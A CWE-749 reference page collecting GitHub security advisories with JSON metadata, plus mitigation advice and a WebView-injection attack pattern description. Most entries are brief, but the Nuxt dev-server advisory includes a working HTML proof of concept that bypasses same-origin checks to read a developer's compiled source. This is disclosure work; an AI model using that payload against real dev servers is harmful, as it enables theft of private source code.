CWE-749
AllowedExposed Dangerous Method or Function
Abstraction: Base · Status: Incomplete
The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.
303 vulnerabilities reference this CWE, most recent first.
GHSA-WQ34-QCH7-HR2G
Vulnerability from github – Published: 2023-03-09 00:30 – Updated: 2023-03-15 21:30REMAP cmd of SVM driver can be used to remap read only memory as read-write, then cause read only memory/file modified.
{
"affected": [],
"aliases": [
"CVE-2021-33639"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-08T23:15:00Z",
"severity": "HIGH"
},
"details": "REMAP cmd of SVM driver can be used to remap read only memory as read-write, then cause read only memory/file modified.",
"id": "GHSA-wq34-qch7-hr2g",
"modified": "2023-03-15T21:30:26Z",
"published": "2023-03-09T00:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33639"
},
{
"type": "WEB",
"url": "https://gitee.com/openeuler/kernel/commit/e4d0684a3ce68e7f8e11408121e791cd80312b27"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WW7H-G2QF-7XV6
Vulnerability from github – Published: 2025-01-14 15:40 – Updated: 2025-05-21 14:13Problem
A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method.
Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions:
- the user opens a malicious link, such as one sent via email.
- the user visits a compromised or manipulated website while the following settings are misconfigured:
security.backend.enforceReferrerfeature is disabled,BE/cookieSameSiteconfiguration is set tolaxornone
The vulnerability in the affected downstream component “Form Framework Module” allows attackers to manipulate or delete persisted form definitions.
Solution
Update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS that fix the problem described.
Credits
Thanks to TYPO3 core and security members Benjamin Franzke, Oliver Hader, Andreas Kienast, Torben Hansen, Elias Häußler who fixed the issue.
References
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 10.4.47"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-form"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"fixed": "10.4.48"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 11.5.41"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-form"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.5.42"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.4.24"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-form"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.4.25"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 13.4.2"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-form"
},
"ranges": [
{
"events": [
{
"introduced": "13.0.0"
},
{
"fixed": "13.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-55922"
],
"database_specific": {
"cwe_ids": [
"CWE-352",
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2025-01-14T15:40:37Z",
"nvd_published_at": "2025-01-14T20:15:30Z",
"severity": "MODERATE"
},
"details": "### Problem\nA vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method.\n\nSuccessful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions:\n\n* the user opens a malicious link, such as one sent via email.\n* the user visits a compromised or manipulated website while the following settings are misconfigured:\n + `security.backend.enforceReferrer` feature is disabled,\n + `BE/cookieSameSite` configuration is set to `lax` or `none`\n\nThe vulnerability in the affected downstream component \u201cForm Framework Module\u201d allows attackers to manipulate or delete persisted form definitions.\n\n### Solution\nUpdate to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS that fix the problem described.\n\n### Credits\nThanks to TYPO3 core and security members Benjamin Franzke, Oliver Hader, Andreas Kienast, Torben Hansen, Elias H\u00e4u\u00dfler who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2025-007](https://typo3.org/security/advisory/typo3-core-sa-2025-007)",
"id": "GHSA-ww7h-g2qf-7xv6",
"modified": "2025-05-21T14:13:01Z",
"published": "2025-01-14T15:40:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-ww7h-g2qf-7xv6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55922"
},
{
"type": "WEB",
"url": "https://github.com/TYPO3-CMS/form/commit/93327743f5dfd31c44898ce16e3e004e05f8ba5f"
},
{
"type": "PACKAGE",
"url": "https://github.com/TYPO3-CMS/form"
},
{
"type": "WEB",
"url": "https://typo3.org/security/advisory/typo3-core-sa-2025-007"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "TYPO3 Form Framework Module vulnerable to Cross-Site Request Forgery"
}
GHSA-WX95-XVQF-3525
Vulnerability from github – Published: 2026-06-10 15:31 – Updated: 2026-06-10 15:31A vulnerability was identified in the Lenovo Android Application, distributed exclusively on tablets in the Chinese market, that could allow a website visited by the built-in browser to overwrite system clipboard contents.
{
"affected": [],
"aliases": [
"CVE-2026-7516"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-10T15:16:42Z",
"severity": "MODERATE"
},
"details": "A vulnerability was identified in the Lenovo Android Application, distributed exclusively on tablets in the Chinese market, that could allow a website visited by the built-in browser to overwrite system clipboard contents.",
"id": "GHSA-wx95-xvqf-3525",
"modified": "2026-06-10T15:31:33Z",
"published": "2026-06-10T15:31:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7516"
},
{
"type": "WEB",
"url": "https://iknow.lenovo.com.cn/detail/440821"
},
{
"type": "WEB",
"url": "https://shop.lenovo.com.cn"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-X63C-C6FQ-2VVQ
Vulnerability from github – Published: 2022-05-17 00:16 – Updated: 2022-05-17 00:16TIT-AL00 smartphones with software versions earlier before TIT-AL00C583B214 have a exposed system interface vulnerability. The software provides a system interface for interaction with external applications, but calling the interface is not properly restricted. An attacker could trick the user into installing a malicious application to call the interface and modify the system properties.
{
"affected": [],
"aliases": [
"CVE-2017-2735"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-11-22T19:29:00Z",
"severity": "HIGH"
},
"details": "TIT-AL00 smartphones with software versions earlier before TIT-AL00C583B214 have a exposed system interface vulnerability. The software provides a system interface for interaction with external applications, but calling the interface is not properly restricted. An attacker could trick the user into installing a malicious application to call the interface and modify the system properties.",
"id": "GHSA-x63c-c6fq-2vvq",
"modified": "2022-05-17T00:16:44Z",
"published": "2022-05-17T00:16:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2735"
},
{
"type": "WEB",
"url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170329-01-smartphone-en"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/97224"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X6QJ-4H56-5RJ5
Vulnerability from github – Published: 2026-06-16 23:39 – Updated: 2026-06-16 23:39Summary
This is an incomplete fix for GHSA-6m52-m754-pw2g. Source code may still be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network.
Details
The fix for GHSA-6m52-m754-pw2g added an Origin / Referer fallback to the dev-middleware same-origin check, with a return true branch when neither header is present so that non-browser clients (curl, the HMR client, address-bar navigation) keep working.
That fallback is bypassed when a cross-origin attacker request reaches the dev server with all three signal headers absent:
Sec-Fetch-Siteis not sent by browsers to non-potentially-trustworthy destinations (HTTP on a non-loopback address).Originis not sent on non-CORS subresource fetches (a bare<script>with nocrossorigin).Referercan be suppressed by the attacker page with<meta name="referrer" content="no-referrer">orreferrerpolicy="no-referrer"on the<script>element.
A classic <script src="http://VICTIM_LAN_IP:3000/_nuxt/app.js" referrerpolicy="no-referrer"> from a non-trustworthy attacker origin produces exactly that header set, the request is allowed, and the attacker page can read the built source out of window.webpackChunk* via Function.prototype.toString().
Since the attack requires the dev server to be reachable via a non-potentially-trustworthy origin, only apps using --host (or --host 0.0.0.0) are affected. Chrome 142+ users are also protected by Local Network Access restrictions.
PoC
- Create a Nuxt project with the webpack / rspack builder.
- Run
npm run dev -- --host 0.0.0.0. - Open
http://localhost:3000on the developer machine. - From a different LAN host, serve the page below and open it in the same browser.
- The compiled module source is exfiltrable from
window.webpackChunknuxt_<projectname>.
<!doctype html>
<meta name="referrer" content="no-referrer">
<script>
['/_nuxt/runtime.js', '/_nuxt/app.js'].forEach(p => {
const s = document.createElement('script')
s.src = 'http://VICTIM_LAN_IP:3000' + p
s.referrerPolicy = 'no-referrer'
document.head.appendChild(s)
})
setTimeout(() => {
const key = Object.keys(window).find(k => k.startsWith('webpackChunk'))
for (const [, mods] of window[key]) {
for (const id in mods) {
console.log(id, mods[id].toString())
}
}
}, 1500)
</script>
Impact
Users using the webpack / rspack builder with nuxt dev --host may get the built source code read by malicious websites on the same network, including module identifiers, the developer's local filesystem path, and any developer-controlled strings inlined into the bundle.
This vulnerability does not affect Chrome 142+ (and other Chromium-based browsers) users due to Local Network Access restrictions.
The default Vite builder is not affected.
Patches
Fixed in @nuxt/webpack-builder@4.4.7 / @nuxt/rspack-builder@4.4.7 and backported to @nuxt/webpack-builder@3.21.7 / @nuxt/rspack-builder@3.21.7 by #35200 (4.x: commit e351de94; 3.x: commit 77187ee4). The dev-middleware same-origin check now treats a request with no Sec-Fetch-Site, no Origin, and no Referer as same-origin only when the dev server is loopback-bound, closing the header-suppression bypass.
The fix only ships for the @nuxt/webpack-builder and @nuxt/rspack-builder packages. The default Vite builder was not affected.
Workarounds
If you cannot upgrade immediately:
- Don't use
nuxt dev --host. Bind the dev server tolocalhost(the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks. - Use Chrome 142+ or another Chromium-based browser that enforces Local Network Access restrictions.
- Switch to the Vite builder for development.
Credit
Reported by Berkan SAL (@Uhudsavasindankacanokcu2) via the Vercel Open Source HackerOne program.
Independently reported by @DavidCarliez via GitHub's coordinated disclosure flow (GHSA-xw96-2f5x-v9pv), closed as a duplicate of this advisory.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@nuxt/webpack-builder"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.4.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@nuxt/webpack-builder"
},
"ranges": [
{
"events": [
{
"introduced": "3.15.4"
},
{
"fixed": "3.21.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@nuxt/rspack-builder"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.4.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@nuxt/rspack-builder"
},
"ranges": [
{
"events": [
{
"introduced": "3.15.4"
},
{
"fixed": "3.21.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-49993"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-16T23:39:16Z",
"nvd_published_at": "2026-06-12T14:16:32Z",
"severity": "MODERATE"
},
"details": "### Summary\nThis is an incomplete fix for [GHSA-6m52-m754-pw2g](https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g). Source code may still be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. `nuxt dev --host`) and the developer opens a malicious site on the same network.\n\n### Details\nThe fix for [GHSA-6m52-m754-pw2g](https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g) added an `Origin` / `Referer` fallback to the dev-middleware same-origin check, with a `return true` branch when neither header is present so that non-browser clients (curl, the HMR client, address-bar navigation) keep working.\n\nThat fallback is bypassed when a cross-origin attacker request reaches the dev server with all three signal headers absent:\n\n- `Sec-Fetch-Site` is [not sent by browsers to non-potentially-trustworthy destinations](https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header) (HTTP on a non-loopback address).\n- `Origin` is not sent on non-CORS subresource fetches (a bare `\u003cscript\u003e` with no `crossorigin`).\n- `Referer` can be suppressed by the attacker page with `\u003cmeta name=\"referrer\" content=\"no-referrer\"\u003e` or `referrerpolicy=\"no-referrer\"` on the `\u003cscript\u003e` element.\n\nA classic `\u003cscript src=\"http://VICTIM_LAN_IP:3000/_nuxt/app.js\" referrerpolicy=\"no-referrer\"\u003e` from a non-trustworthy attacker origin produces exactly that header set, the request is allowed, and the attacker page can read the built source out of `window.webpackChunk*` via `Function.prototype.toString()`.\n\nSince the attack requires the dev server to be reachable via a non-potentially-trustworthy origin, only apps using `--host` (or `--host 0.0.0.0`) are affected. Chrome 142+ users are also protected by [Local Network Access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n\n### PoC\n1. Create a Nuxt project with the webpack / rspack builder.\n1. Run `npm run dev -- --host 0.0.0.0`.\n1. Open `http://localhost:3000` on the developer machine.\n1. From a different LAN host, serve the page below and open it in the same browser.\n1. The compiled module source is exfiltrable from `window.webpackChunknuxt_\u003cprojectname\u003e`.\n\n```html\n\u003c!doctype html\u003e\n\u003cmeta name=\"referrer\" content=\"no-referrer\"\u003e\n\u003cscript\u003e\n [\u0027/_nuxt/runtime.js\u0027, \u0027/_nuxt/app.js\u0027].forEach(p =\u003e {\n const s = document.createElement(\u0027script\u0027)\n s.src = \u0027http://VICTIM_LAN_IP:3000\u0027 + p\n s.referrerPolicy = \u0027no-referrer\u0027\n document.head.appendChild(s)\n })\n setTimeout(() =\u003e {\n const key = Object.keys(window).find(k =\u003e k.startsWith(\u0027webpackChunk\u0027))\n for (const [, mods] of window[key]) {\n for (const id in mods) {\n console.log(id, mods[id].toString())\n }\n }\n }, 1500)\n\u003c/script\u003e\n```\n\n### Impact\nUsers using the webpack / rspack builder with `nuxt dev --host` may get the built source code read by malicious websites on the same network, including module identifiers, the developer\u0027s local filesystem path, and any developer-controlled strings inlined into the bundle.\n\nThis vulnerability does not affect Chrome 142+ (and other Chromium-based browsers) users due to [Local Network Access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n\nThe default Vite builder is not affected.\n\n### Patches\nFixed in `@nuxt/webpack-builder@4.4.7` / `@nuxt/rspack-builder@4.4.7` and backported to `@nuxt/webpack-builder@3.21.7` / `@nuxt/rspack-builder@3.21.7` by [#35200](https://github.com/nuxt/nuxt/pull/35200) (4.x: commit [`e351de94`](https://github.com/nuxt/nuxt/commit/e351de943e82db16970618b60dc7fdbaa58630f3); 3.x: commit [`77187ee4`](https://github.com/nuxt/nuxt/commit/77187ee4015e9267fb464951542a3e09e8b5fa05)). The dev-middleware same-origin check now treats a request with no `Sec-Fetch-Site`, no `Origin`, and no `Referer` as same-origin only when the dev server is loopback-bound, closing the header-suppression bypass.\n\nThe fix only ships for the `@nuxt/webpack-builder` and `@nuxt/rspack-builder` packages. The default Vite builder was not affected.\n\n### Workarounds\nIf you cannot upgrade immediately:\n\n- Don\u0027t use `nuxt dev --host`. Bind the dev server to `localhost` (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks.\n- Use Chrome 142+ or another Chromium-based browser that enforces [Local Network Access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n- Switch to the Vite builder for development.\n\n### Credit\nReported by Berkan SAL ([@Uhudsavasindankacanokcu2](https://github.com/Uhudsavasindankacanokcu2)) via the Vercel Open Source HackerOne program.\n\nIndependently reported by [@DavidCarliez](https://github.com/DavidCarliez) via GitHub\u0027s coordinated disclosure flow (`GHSA-xw96-2f5x-v9pv`), closed as a duplicate of this advisory.",
"id": "GHSA-x6qj-4h56-5rj5",
"modified": "2026-06-16T23:39:17Z",
"published": "2026-06-16T23:39:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g"
},
{
"type": "WEB",
"url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-x6qj-4h56-5rj5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49993"
},
{
"type": "WEB",
"url": "https://github.com/nuxt/nuxt/pull/35200"
},
{
"type": "WEB",
"url": "https://github.com/nuxt/nuxt/commit/77187ee4015e9267fb464951542a3e09e8b5fa05"
},
{
"type": "WEB",
"url": "https://github.com/nuxt/nuxt/commit/e351de943e82db16970618b60dc7fdbaa58630f3"
},
{
"type": "PACKAGE",
"url": "https://github.com/nuxt/nuxt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "@nuxt/webpack-builder and @nuxt/rspack-builder dev server same-origin check bypassed when Sec-Fetch-Site, Origin, and Referer are all absent (incomplete fix for GHSA-6m52-m754-pw2g)"
}
GHSA-X76F-6Q7R-J9QQ
Vulnerability from github – Published: 2024-07-15 15:31 – Updated: 2024-07-15 15:31Local Privilege Escalation in MSI-Installer in baramundi Management Agent v23.1.172.0 on Windows allows a local unprivileged user to escalate privileges to SYSTEM.
{
"affected": [],
"aliases": [
"CVE-2024-6689"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-15T14:15:03Z",
"severity": "HIGH"
},
"details": "Local Privilege Escalation in MSI-Installer in baramundi Management Agent v23.1.172.0 on Windows allows a local unprivileged user to escalate privileges to SYSTEM.",
"id": "GHSA-x76f-6q7r-j9qq",
"modified": "2024-07-15T15:31:01Z",
"published": "2024-07-15T15:31:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6689"
},
{
"type": "WEB",
"url": "https://www.baramundi.com/en-us/security-info/s-2024-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X77X-P923-HP6Q
Vulnerability from github – Published: 2025-12-24 00:30 – Updated: 2025-12-24 00:30RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27658.
{
"affected": [],
"aliases": [
"CVE-2025-14489"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-23T22:15:49Z",
"severity": "HIGH"
},
"details": "RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27658.",
"id": "GHSA-x77x-p923-hp6q",
"modified": "2025-12-24T00:30:16Z",
"published": "2025-12-24T00:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14489"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1165"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X7H5-VHW2-PMFF
Vulnerability from github – Published: 2026-05-04 18:30 – Updated: 2026-05-04 18:30Memory corruption while processing IOCTL command when device is in power-save state.
{
"affected": [],
"aliases": [
"CVE-2026-25266"
],
"database_specific": {
"cwe_ids": [
"CWE-749",
"CWE-787"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-04T17:16:22Z",
"severity": "MODERATE"
},
"details": "Memory corruption while processing IOCTL command when device is in power-save state.",
"id": "GHSA-x7h5-vhw2-pmff",
"modified": "2026-05-04T18:30:30Z",
"published": "2026-05-04T18:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25266"
},
{
"type": "WEB",
"url": "https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X86W-JCWP-263F
Vulnerability from github – Published: 2024-05-03 03:31 – Updated: 2024-05-03 03:31Voltronic Power ViewPower MonitorConsole Exposed Dangerous Method Denial-of-Service Vulnerability. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Voltronic Power ViewPower. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the MonitorConsole class. The issue results from an exposed dangerous method. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-22024.
{
"affected": [],
"aliases": [
"CVE-2023-51578"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-03T03:16:17Z",
"severity": "HIGH"
},
"details": "Voltronic Power ViewPower MonitorConsole Exposed Dangerous Method Denial-of-Service Vulnerability. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Voltronic Power ViewPower. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the MonitorConsole class. The issue results from an exposed dangerous method. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-22024.",
"id": "GHSA-x86w-jcwp-263f",
"modified": "2024-05-03T03:31:07Z",
"published": "2024-05-03T03:31:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51578"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-23-1884"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XFP5-23MR-JWJM
Vulnerability from github – Published: 2025-07-17 21:32 – Updated: 2025-07-17 21:32GoldenDict 1.5.0 and 1.5.1 has an exposed dangerous method that allows reading and modifying files when a user adds a crafted dictionary and then searches for any term included in that dictionary.
{
"affected": [],
"aliases": [
"CVE-2025-53964"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-17T20:15:30Z",
"severity": "CRITICAL"
},
"details": "GoldenDict 1.5.0 and 1.5.1 has an exposed dangerous method that allows reading and modifying files when a user adds a crafted dictionary and then searches for any term included in that dictionary.",
"id": "GHSA-xfp5-23mr-jwjm",
"modified": "2025-07-17T21:32:16Z",
"published": "2025-07-17T21:32:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53964"
},
{
"type": "WEB",
"url": "https://github.com/goldendict/goldendict/releases"
},
{
"type": "WEB",
"url": "https://github.com/tigr78/CVE-2025-53964"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L",
"type": "CVSS_V3"
}
]
}
Mitigation
If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities.
Mitigation
Strategy: Attack Surface Reduction
- Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:
- Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting.
- accessible to all users
- restricted to a small set of privileged users
- prevented from being directly accessible at all
CAPEC-500: WebView Injection
An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.